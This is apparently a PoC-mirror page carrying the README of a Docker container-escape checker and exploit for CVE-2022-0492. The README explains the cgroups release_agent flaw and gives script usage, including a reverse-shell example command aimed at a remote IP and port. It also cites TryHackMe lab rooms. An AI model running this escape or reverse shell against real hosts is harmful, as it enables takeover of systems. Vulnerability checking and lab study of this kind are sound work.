Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-0492 PoC — Linux kernel 授权问题漏洞

Source
https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC
Associated Vulnerability
Title:Linux kernel 授权问题漏洞 (CVE-2022-0492)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在授权问题漏洞,该漏洞源于软件对用权限限制存在问题。攻击者可利用该漏洞可以通过Cgroups Release Agent 绕过Linux内核的限制,以升级他的权限。
Description
Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)
Readme
# CVE-2022-0492 Docker Breakout Checker and PoC

## Summary

Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.

## Usage

```
# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

```

## Examples

### [Hamlet](https://tryhackme.com/room/hamlet) from TryHackMe
Root user in host machine pwned by disabling UFW and then sent a reverse shell.

![](/assets/Hamlet.gif)


### [Misguided Ghosts](https://tryhackme.com/room/misguidedghosts) from TryHackMe
Root user in host machine pwned by setting SUID to bash, also sent reverse shell.

![](/assets/Misguided_Ghosts.gif)

#### Sources:
- https://github.com/puckiestyle/CVE-2022-0492
- http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
File Snapshot

 [4.0K]  /data/pocs/22fd863c78653c13da229a734b0087f81d635cce
├── [4.0K]  assets
│   ├── [1.5M]  Hamlet.gif
│   └── [1.9M]  Misguided_Ghosts.gif
├── [4.7K]  CVE-2022-0492.sh
├── [ 34K]  LICENSE
└── [2.1K]  README.md

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.